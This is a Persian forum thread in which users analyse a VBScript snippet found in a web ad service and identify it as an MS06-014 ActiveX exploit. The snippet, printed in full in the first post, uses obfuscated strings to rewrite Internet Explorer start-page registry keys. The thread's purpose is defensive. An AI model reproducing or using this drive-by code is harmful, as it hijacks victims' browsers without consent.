تفسیر یک نمونه کد

microsoftsat · Dec 20, 2008

با سلام

دوستان اگر در تفسیر کد زیر بنده رو راهنمایی نمایند ممنون خواهم بود.

PHP:

Function AxClip()
Set axclip_sub_ir = document.createElement("object")
axclip_sub_ir.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36 "
set jjhacker = axclip_sub_ir.createobject("wscript.shell","")
hr="092083079070084087065082069092077105099114111115111102116092073110116101114110101116032069120112108111114101114092077097105110092083116097114116032080097103101"
re1="072075069089095076079067065076095077065067072073078069"
re2="072075069089095067085082082069078084095085083069082"
For axclip = 1 To Len(hr) Step 3
hr2=hr2 & chr(mid(hr,axclip,3))
next
For axclip = 1 To Len(re1) Step 3
re1_b=re1_b & chr(mid(re1,axclip,3))
next
For axclip = 1 To Len(re2) Step 3
re2_b=re2_b & chr(mid(re2,axclip,3))
next
jjhacker.regwrite re1_b & hr2,axclip_name
jjhacker.regwrite re2_b & hr2,axclip_name
AxClip=SetTimeOut("axclip", (pars20*1), "VBScript")
'MsgBox now()
end Function
AxClip

سربلند باشید.

echessdesign · Dec 21, 2008

درود بر شما
به نظر من یک ویروس با استفاده از کد VB اسکریپت هست که در انتهای فایل های HTML نشته و پی در پی باعث Alert در ویندوز می شه....

microsoftsat · Dec 21, 2008

ممنونم بابت پاسخ شما.

میتونید نوع خرابکاری اون رو هم مشخص کنید؟

متاسفانه این کد در یکی ازسرویس های وب که ممکنه مخاطب زیادی هم داشته باشه استفاده شده است.
اسم سرویس رو ذکر نمی کنم تا دقیق علت و انگیزه اونها رو متوجه بشم و بعد تصمیم مناسبی بگیریم.

متشکر.

echessdesign · Dec 22, 2008

درود بر شما
باعث بالا رفتن لود CPU می شود و پی در پی صفحه خطا در ویندوز XP باز می شود.
پیش در این رابطه در انجمن، (تصور کنم Client Side) بحث شده و آنتی ویروس در آن قرار داده شده است.
پاینده باشید.

کاک کوروش · Jan 1, 2009

این ویروس تروجان یا اکسپلویت رو بیشتر با نام
Exploit-MS06-014
میشناسن
که متاسفانه در میان سرویسهای وب فارسی از جمله لینک باکس ها و سایتهای تبلیغاتی

دیده شده !
متاسفانه من هم امروز با تذکر یکی از کابرانم متوجه شدم و سریعا تبلیغات رو از سایتم حذف کردم
و به اون سایت تبلیغاتی اطلاع دادم و منتظر جوابشون هستم

این سورس در mainh.vbs
که در سیستم دانلود میشه
محتوای اون جای هیچ حرفی رو باقی نمیذاره
و چیزی به اسم سهو و خطا ! پذیرفتینی نیست
من منتظر میمونم ببینم چه توضیحی خواهند داد در صورت لزوم بیشتر در این مورد خواهم نوشت

این کد رو
AntiVir به نام
HTML/Malicious.ActiveX.Gen
میشناسه

Avast ===>VBS:Malware-gen
F-Secure====>Trojan.JS.StartPage.an
GData=====>VBS:Malware-gen
Kaspersky===>Trojan.JS.StartPage.an
McAfee=====>Exploit-MS06-014
SecureWeb-Gateway====>Script.Malicious.ActiveX.Gen
Sophos====>Troj/VBMDAC-A
TrendMicro====>JS_AGENT.CIZZ همون پی سی سیلین

microsoftsat · Jan 1, 2009

کاک کوروش گفت:
این ویروس تروجان یا اکسپلویت رو بیشتر با نام
exploit-ms06-014
میشناسن
که متاسفانه در میان سرویسهای وب فارسی از جمله لینک باکس ها و سایتهای تبلیغاتی دیده شده !
متاسفانه من هم امروز با تذکر یکی از کابرانم متوجه شدم و سریعا تبلیغات رو از سایتم حذف کردم
و به اون سایت تبلیغاتی اطلاع دادم و منتظر جوابشون هستم

این سورس در mainh.vbs
که در سیستم دانلود میشه
محتوای اون جای هیچ حرفی رو باقی نمیذاره
و چیزی به اسم سهو و خطا ! پذیرفتینی نیست
من منتظر میمونم ببینم چه توضیحی خواهند داد در صورت لزوم بیشتر در این مورد خواهم نوشت

این کد رو
antivir به نام
html/malicious.activex.gen
میشناسه

avast ===>vbs:malware-gen
f-secure====>trojan.js.startpage.an
gdata=====>vbs:malware-gen
kaspersky===>trojan.js.startpage.an
mcafee=====>exploit-ms06-014
secureweb-gateway====>script.malicious.activex.gen
sophos====>troj/vbmdac-a
trendmicro====>js_agent.cizz همون پی سی سیلین

دوست عزیز سلام

من میخواستم تا مطمئن نشدن از قصد اونها و دلایل محکم فنی، هیچ اطلاعی به شرکت و سایت استفاده کننده از کد داده نشود! وگرنه که می توانستم حتی عنوان تاپیک رو مناسب تر انتخاب کنم و بدون واهمه نام و نشانی اونها رو اعلام کنم و از راه قانونی (ماشاالله داره قانون های خوبی تصویب میشه) یا حتی غیرقانونی جلوی فعالیت آنها را بگیرم.

مطمئنا آنها بدون فکر اینکار رو نکردن! حتی این کد کوچک بر روی سرور اصلی خودشان قرار نگرفته است! روی سرور دیگری که به نظر هاست رایگان میاد، قرار گرفته! یا شاید هم اون سرور خودشونه ولی با ظاهری شبیه هاست های رایگان!
اطلاع دادن شما به آنها میتونه باعث بشه روش کار رو تغییر بدن یا فعلا تا چند وقت از این کار دست بکشن تا آبها از آسیاب بیفتد!!! . . .

در هر صورت از اینکه پیگیری میکنید ممنونم.
چون من اصلا سر رشته ای در این نوع کدها ندارم و به کمک شما دوستان نیازمندم.

سربلند باشید.

کاک کوروش · Jan 1, 2009

تشکر میکنم بابت جوابت دوست عزیز
فرمایش شما متین
همونطوری که عرض کردم خدمتتون این گروه خودشون اطلاع دارند که کاربران متوجه شده اند
چون در نامه ای به کاربرانشون تلویحا به این قضیه اشاره کردند
چیز خاصی باقی نمونده جز جواب اونها که یا اعلام میکنن اشتباهی رخ داده (غیر ممکنه) یا اصلا جوابی نمیدن که به این معناست اصلا اهمیتی قائل نیستند
یادآوری کنم قبل از اینکه من این تاپیک رو مشاهده کنم نامه رو ارسال کرده بودم
همونطوری که گفتین فایل روی سرور مجانی آپلود شده
من هم اطلاعی از این کدها ندارم اما اون قسمت hr
و r1 ,r2
میتونن کد شده ی آدرس یک فایل یگه باشند چون این شیوه سابقه داره
j----j----hacker هم
اگر تشابه اسمی نباشه سابقا یکی از پسورد سندر نویسهای ایرانی بود
امیدوارم در این مدت که این گروه فعال بوده یا حداقل توسط سایت من روزانه بیش از 10 هزار بار
این کد اجرا شده آسیبی به جایی یا کسی وارد نشده باشه و
اونا بتونن توضیح مناسبی بدن
بازم تشکر میکنم از شما

ehsun7b · Mar 1, 2009

سلام
من هنوز وقت نکردم کد رو به دقت بخونم اما از syntax کد به نظر میاد که دوستمون درست می گه و کد VB Script (نه VB) باشه! در اینصورت قربانی ها فقط کاربران اینترنت اکسپلورر خواهند بود!!!

ولی نیاز به بررسی داره! بیش از خود کد، هدف قرار دادن اون مهمه!
میشه یه نفر بگه این کد رو دقیقا از چه مسیری میشه گیر آورد؟

کاک کوروش · Apr 5, 2009

این کد همونطور که دوستمون گفتند وی بی اسکریپته و فقط در آی ای (حداقل در 6 ) کار میکنه و در فایرفاکس موزیلا خوشبختانه کار نمیکنه یه آدرس رو هوم پیج کاربرا میکنه خیلی هم عجیب نیست یکی از دوستان اول کار به من گفت بهتر بود نمیگفتی و فلان و ... خب بچه ها راحت میتونن از روی این کدی که گذاشته شده بفهمن که مروبوط به کجاست و در واقع سایت خاطی که بارها بهش تذکر دادم من همه چیو حاشا میکنن مشخص میشه ....